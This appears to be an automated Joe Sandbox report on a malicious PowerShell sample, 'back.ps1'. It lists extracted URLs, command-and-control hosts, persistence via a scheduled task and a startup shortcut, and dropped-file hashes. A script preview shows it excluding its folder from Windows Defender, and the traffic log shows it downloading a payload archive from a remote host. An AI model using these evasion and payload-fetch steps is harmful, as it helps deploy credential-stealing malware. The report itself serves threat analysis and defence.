https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename	zed.exe, 0000000C.00000002.4732439462.00000132F7CD0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	zed.exe, 0000000C.00000002.4740170642.00000132F9640000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4739872009.00000132F90F0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688	zed.exe, 0000000C.00000002.4732439462.00000132F7CD0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://ocsp.accv.ests:	zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://httpbin.org/get	zed.exe, 0000000C.00000002.4739872009.00000132F90F0000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4740170642.00000132F96B3000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000000.00000002.4741697049.000001EE178C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://packaging.python.org/en/latest/specifications/entry-points/	zed.exe, 0000000C.00000002.4739575389.00000132F8EE0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000000.00000002.4741697049.000001EE16F41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access	zed.exe, 0000000C.00000003.3081131778.00000132F83DA000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3080130566.00000132F83D5000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3090542361.00000132F8375000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000000.00000002.4741697049.000001EE16F41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pypi.org/project/build/).	zed.exe, 0000000C.00000002.4739575389.00000132F8EE0000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4739426340.00000132F8DE0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000000.00000002.4741697049.000001EE16F41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code	zed.exe, 0000000C.00000002.4732439462.00000132F7D4C000.00000004.00001000.00020000.00000000.sdmp	false		high
https://wwww.certigna.fr/autorites/0m	zed.exe, 0000000C.00000002.4736620041.00000132F8976000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	zed.exe, 0000000C.00000002.4733711080.00000132F7EA0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://foo/bar.tgz	zed.exe, 0000000C.00000002.4739094462.00000132F8BE0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/python/cpython/issues/86361.	zed.exe, 0000000C.00000003.3081131778.00000132F83DA000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4733711080.00000132F7EF4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000000.00000002.4854162268.000001EE26D91000.00000004.00000800.00020000.00000000.sdmp	false		high
https://httpbin.org/	zed.exe, 0000000C.00000002.4733711080.00000132F7EF4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://wwww.certigna.fr/autorites/	zed.exe, 0000000C.00000002.4740739040.00000132F9775000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cryptography.io/en/latest/faq/#why-can-t-i-import-my-pem-file	zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp	false		high
https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz	zed.exe, 0000000C.00000003.3082680164.00000132F895D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3089378618.00000132F886F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3084201791.00000132F8880000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3082680164.00000132F8910000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3082961123.00000132F8880000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3087129020.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module	zed.exe, 0000000C.00000002.4734251410.00000132F80E0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches	zed.exe, 0000000C.00000002.4734251410.00000132F80E0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.ietf.org/rfc/rfc3447.txt	zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738469312.00000132F8AD2000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000000.00000002.4741697049.000001EE16F41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://packaging.python.org/en/latest/guides/packaging-namespace-packages/.	zed.exe, 0000000C.00000002.4739575389.00000132F8EE0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://packaging.python.org/en/latest/specifications/pyproject-toml/#declaring-project-metadata-the	zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3087129020.00000132F8A2F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy	zed.exe, 0000000C.00000002.4733711080.00000132F7EA0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.python.org/psf/license/	zed.exe, 0000000C.00000002.4755379300.00007FFD8B568000.00000008.00000001.01000000.0000000A.sdmp	false		high
http://tango.freedesktop.org/Tango_Desktop_Project	zed.exe, 00000007.00000003.3198438648.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp	false		high
https://docs.python.org/3/library/multiprocessing.html	zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3090542361.00000132F8483000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pypa/setuptools/issues/417#issuecomment-392298401	zed.exe, 0000000C.00000002.4739426340.00000132F8DE0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://crl.securetrust.com/STCA.crl	zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://wwwsearch.sf.net/):	zed.exe, 0000000C.00000002.4738469312.00000132F8B41000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0	zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.accv.es/legislacion_c.htm	zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tools.ietf.org/html/rfc6125#section-6.4.3	zed.exe, 0000000C.00000002.4740017345.00000132F9540000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.zlib.net/D	zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4761922586.00007FFDA3348000.00000008.00000001.01000000.00000020.sdmp	false		high
https://cffi.readthedocs.io/en/latest/using.html#callbacks	zed.exe, 0000000C.00000002.4762266975.00007FFDA34EC000.00000002.00000001.01000000.0000001C.sdmp	false		high
http://crl.xrampsecurity.com/XGCA.crl0	zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000000.00000002.4741697049.000001EE16F41000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bugs.python.org/issue44497.	zed.exe, 0000000C.00000002.4739426340.00000132F8DE0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.cert.fnmt.es/dpcs/	zed.exe, 0000000C.00000002.4738469312.00000132F8B41000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://setuptools.pypa.io/en/latest/pkg_resources.html	zed.exe, 0000000C.00000003.3080130566.00000132F83D5000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3080331199.00000132F839E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://google.com/mail	zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	false		high
https://linuxreviews.org/HOWTO_change_the_mouse_speed_	zed.exe, 0000000C.00000002.4743750597.00000132F9AF9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://.VisualC	powershell.exe, 00000000.00000002.4871936149.000001EE2F106000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://packaging.python.org/specifications/entry-points/	zed.exe, 0000000C.00000002.4739575389.00000132F8EE0000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4739426340.00000132F8DE0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/jaraco/jaraco.functools/issues/5	zed.exe, 0000000C.00000002.4739094462.00000132F8BE0000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.accv.es00	zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.python.org/psf/license/)	zed.exe, 0000000C.00000002.4754569858.00007FFD8B3F2000.00000002.00000001.01000000.0000000A.sdmp	false		high
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	zed.exe, 0000000C.00000002.4733711080.00000132F7EA0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://usjjsjsj.com.ng/post_fenec_key_user.php?userID=00000000p	zed.exe, 0000000C.00000002.4745134537.00000132F9FD0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.rfc-editor.org/info/rfc7253	zed.exe, 0000000C.00000002.4740870539.00000132F97BD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/pyca/cryptography/issues	zed.exe, 0000000C.00000002.4750265238.00007FFD8A917000.00000002.00000001.01000000.0000001B.sdmp	false		high
http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf	zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738469312.00000132F8B41000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/rfc8017#page-67	zed.exe, 0000000C.00000002.4740870539.00000132F982D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://foss.heptapod.net/pypy/pypy/-/issues/3539	zed.exe, 0000000C.00000002.4739722176.00000132F8FE0000.00000004.00001000.00020000.00000000.sdmp	false		high
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	false		high
http://google.com/	zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	false		high
https://mahler:8092/site-updates.py	zed.exe, 0000000C.00000003.3084201791.00000132F88FC000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3087129020.00000132F88DD000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3084052929.00000132F895F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3085033089.00000132F8907000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	false		high
https://creativecommons.org/licenses/by-sa/3.0/)	zed.exe, 00000007.00000003.3198438648.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.securetrust.com/SGCA.crl	zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.microsoft.coK	powershell.exe, 00000000.00000002.4876531934.000001EE2F4F7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://.../back.jpeg	zed.exe, 0000000C.00000002.4740017345.00000132F9540000.00000004.00001000.00020000.00000000.sdmp	false		high
https://tools.ietf.org/html/rfc7231#section-4.3.6)	zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tools.ietf.org/html/rfc5869	zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.132.252.48	usjjsjsj.com.ng	Canada		22686	UNIVERSITYOFWINNIPEG-ASNCA	false
104.26.13.205	api.ipify.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1566089
Start date and time:	2024-12-01 10:36:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	36
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	back.ps1
Detection:	MAL
Classification:	mal100.rans.spyw.evad.winPS1@36/2334@2/2
EGA Information:	Successful, ratio: 22.2%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .ps1 Override analysis time to 240s for powershell

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, VSSVC.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target ChromeComboPack.exe, PID 6860 because it is empty
Execution Graph export aborted for target powershell.exe, PID 2064 because it is empty
Execution Graph export aborted for target powershell.exe, PID 3136 because it is empty
Execution Graph export aborted for target powershell.exe, PID 4132 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7120 because it is empty
Execution Graph export aborted for target zed.exe, PID 3196 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
04:37:23	API Interceptor	90x Sleep call for process: powershell.exe modified
10:38:30	Task Scheduler	Run new task: RunzedEvery2Minutes path: C:\Users\user\Documents\gogjothegoat\payload\zed.exe
10:38:31	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RunTaskboyOnStartup.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
142.132.252.48	ChromeComboPack.exe	Get hash	malicious	Python Stealer	Browse
	og.ps1	Get hash	malicious	Unknown	Browse
	bold.ps1	Get hash	malicious	Unknown	Browse
	ad.ps1	Get hash	malicious	Unknown	Browse
104.26.13.205	2b7cu0KwZl.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
usjjsjsj.com.ng	ChromeComboPack.exe	Get hash	malicious	Python Stealer	Browse	142.132.252.48
	og.ps1	Get hash	malicious	Unknown	Browse	142.132.252.48
	bold.ps1	Get hash	malicious	Unknown	Browse	142.132.252.48
	ad.ps1	Get hash	malicious	Unknown	Browse	142.132.252.48
api.ipify.org	zed.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	kyjjrfgjjsedf.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	kohjaekdfth.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	kthkksefd.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	jhnykawfkth.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205
	siveria.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	weWHT1b7JO.dll	Get hash	malicious	Unknown	Browse	104.26.13.205
	Employee_Secure_Doc.pdf	Get hash	malicious	Unknown	Browse	172.67.74.152
	unique.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	172.67.74.152
	siveria.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	zed.exe	Get hash	malicious	Unknown	Browse	172.67.74.152
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.178.189
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	104.28.75.41
	gKWbina3a4.bat	Get hash	malicious	Stealerium	Browse	104.16.184.241
	tnsoldfik82.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	tnksadfj28.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	Hnsajdkfjd28.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	172.65.251.78
	file.exe	Get hash	malicious	Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	104.21.16.9
	file.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.16.9
UNIVERSITYOFWINNIPEG-ASNCA	ChromeComboPack.exe	Get hash	malicious	Python Stealer	Browse	142.132.252.48
	og.ps1	Get hash	malicious	Unknown	Browse	142.132.252.48
	bold.ps1	Get hash	malicious	Unknown	Browse	142.132.252.48
	ad.ps1	Get hash	malicious	Unknown	Browse	142.132.252.48
	nabarm5.elf	Get hash	malicious	Unknown	Browse	142.132.155.193
	powerpc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	142.132.46.211
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	142.132.201.10
	la.bot.sh4.elf	Get hash	malicious	Unknown	Browse	142.132.18.86
	http://puzzlewood.net	Get hash	malicious	Unknown	Browse	142.132.138.215
	https://thiiirrrrddddddd-30x.pages.dev/	Get hash	malicious	TechSupportScam	Browse	142.132.152.50

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	og.ps1	Get hash	malicious	Unknown	Browse	142.132.252.48
	bold.ps1	Get hash	malicious	Unknown	Browse	142.132.252.48
	ad.ps1	Get hash	malicious	Unknown	Browse	142.132.252.48
	invoice-6483728493.pdf .js	Get hash	malicious	RHADAMANTHYS	Browse	142.132.252.48
	gKWbina3a4.bat	Get hash	malicious	Stealerium	Browse	142.132.252.48
	tnsoldfik82.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	142.132.252.48
	tnksadfj28.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	142.132.252.48
	Hnsajdkfjd28.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	142.132.252.48
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	142.132.252.48
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	142.132.252.48

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_ARC4.pyd	zed.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Python Stealer, Amadey, LummaC Stealer, Nymaim, Stealc	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Amadey, Cryptbot	Browse
	file.exe	Get hash	malicious	Amadey, XWorm	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	Payload.exe	Get hash	malicious	Python Stealer, BLX Stealer, XLABB Grabber	Browse
	Payload.exe	Get hash	malicious	Python Stealer, BLX Stealer, XLABB Grabber	Browse
	Creal.exe	Get hash	malicious	Creal Stealer	Browse
	#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe	Get hash	malicious	Blank Grabber, Creal Stealer	Browse
C:\Users\user\AppData\Local\Temp\_MEI13362\Crypto\Cipher\_Salsa20.pyd	zed.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Python Stealer, Amadey, LummaC Stealer, Nymaim, Stealc	Browse
	file.exe	Get hash	malicious	Python Stealer	Browse
	file.exe	Get hash	malicious	Python Stealer	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Amadey, Cryptbot	Browse
	file.exe	Get hash	malicious	Amadey, XWorm	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	Payload.exe	Get hash	malicious	Python Stealer, BLX Stealer, XLABB Grabber	Browse
	Payload.exe	Get hash	malicious	Python Stealer, BLX Stealer, XLABB Grabber	Browse

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	47721
Entropy (8bit):	5.074822205763267
Encrypted:	false
SSDEEP:	768:aUWIbV3IpNBQkj2Uh4iUxTaVLfrRJv5FPvlOZhsHvhbardFxJz7OdBYNmzqtAHkU:aU1bV3CNBQkj2Uh4iUxTaVLflJnPvlOA
MD5:	1B20CD704D6A154973E28C70CBCA473E
SHA1:	99863A35D0E04E4B5E608ADFB8F4CCEF75D87E51
SHA-256:	222D8E4703CDD8D1173A38BBF48D1B04BBED749E0B4FEF49C22D20F2E570057F
SHA-512:	7DB84F48F9143D1F28CB7FD2B368D70F4F89DF17B13EEF40772FBEA0DCCDD8378B66E056F45286645AAC4C4728742C06D17AB2ACF31A29A357CEEEADDA4D4E92
Malicious:	false
Preview:	PSMODULECACHE.I....zcL.z..?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PKI\PKI.psd1........Export-Certificate........Get-CertificateNotificationTask........Get-PfxData........New-CertificateNotificationTask........Import-PfxCertificate....#...Set-CertificateAutoEnrollmentPolicy........Export-PfxCertificate........Switch-Certificate........New-SelfSignedCertificate....%...Get-CertificateEnrollmentPolicyServer....%...Add-CertificateEnrollmentPolicyServer....(...Remove-CertificateEnrollmentPolicyServer........Import-Certificate........Test-Certificate........Get-Certificate...."...Remove-CertificateNotificationTask....#...Get-CertificateAutoEnrollmentPolicy........m.\3.z..q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1........Set-DAEntryPointTableItem....#...Set-DAClientExperienceConfiguration...."...Enable-DAManualEntryPointSelection........Get-DAEntryPointTableItem........Reset-DAEntryPointTableItem....%...R

Process:	C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:qn:qn
MD5:	3F1D1D8D87177D3D8D897D7E421F84D6
SHA1:	DD082D742A5CB751290F1DB2BD519C286AA86D95
SHA-256:	F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
SHA-512:	2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
Malicious:	false
Preview:	blat

File type:	ASCII text, with CRLF line terminators
Entropy (8bit):	5.105308545388046
TrID:
File name:	back.ps1
File size:	4'417 bytes
MD5:	a5b77ea033190c4d914caec05d0d3442
SHA1:	a706128c4d0ebb2e1392ebc5bf72e6977802e86b
SHA256:	a8ef13f70701de206e5d946838605d299bb096caa6c149e70af25e938bed576a
SHA512:	7ee35745d43081c45b62e0713343b8238336f701dfb904224e58c1b7e9324f4462c543d4d4bba1ca0c1193acb4144f7e0406a9e19515eae903c64ff117f606cc
SSDEEP:	96:4J6BlVTuJP44AQ4Zy5cJEJa0OK5uTl0zzuy:4J6nMJP4s4QyJEJa0O1Tl0zzuy
TLSH:	AD91F034D501A13546F38B1BEAE0CA00EE8600AE6512294B754D64847FFADAD8799F7B
File Content Preview:	..$documentsPath = [Environment]::GetFolderPath("MyDocuments")..$folderPath = Join-Path -Path $documentsPath -ChildPath "gogjothegoat"..$processName = "zed.exe"..Add-MpPreference -ExclusionPath $folderPath \| Out-Null..Write-Host "Fetching Document -- 1% -

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 1, 2024 10:37:27.402621031 CET	192.168.2.6	1.1.1.1	0xe7a2	Standard query (0)	usjjsjsj.com.ng	A (IP address)	IN (0x0001)	false
Dec 1, 2024 10:38:45.960443974 CET	192.168.2.6	1.1.1.1	0xe95c	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 1, 2024 10:37:27.541598082 CET	1.1.1.1	192.168.2.6	0xe7a2	No error (0)	usjjsjsj.com.ng	142.132.252.48	A (IP address)	IN (0x0001)	false
Dec 1, 2024 10:38:46.102710962 CET	1.1.1.1	192.168.2.6	0xe95c	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Dec 1, 2024 10:38:46.102710962 CET	1.1.1.1	192.168.2.6	0xe95c	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Dec 1, 2024 10:38:46.102710962 CET	1.1.1.1	192.168.2.6	0xe95c	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
2024-12-01 09:37:29 UTC	179	OUT	GET /execute/payload.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: usjjsjsj.com.ng Connection: Keep-Alive
2024-12-01 09:37:29 UTC	397	IN	HTTP/1.1 200 OK Connection: close content-type: application/zip last-modified: Fri, 01 Nov 2024 03:04:08 GMT accept-ranges: bytes content-length: 36368223 date: Sun, 01 Dec 2024 09:37:29 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
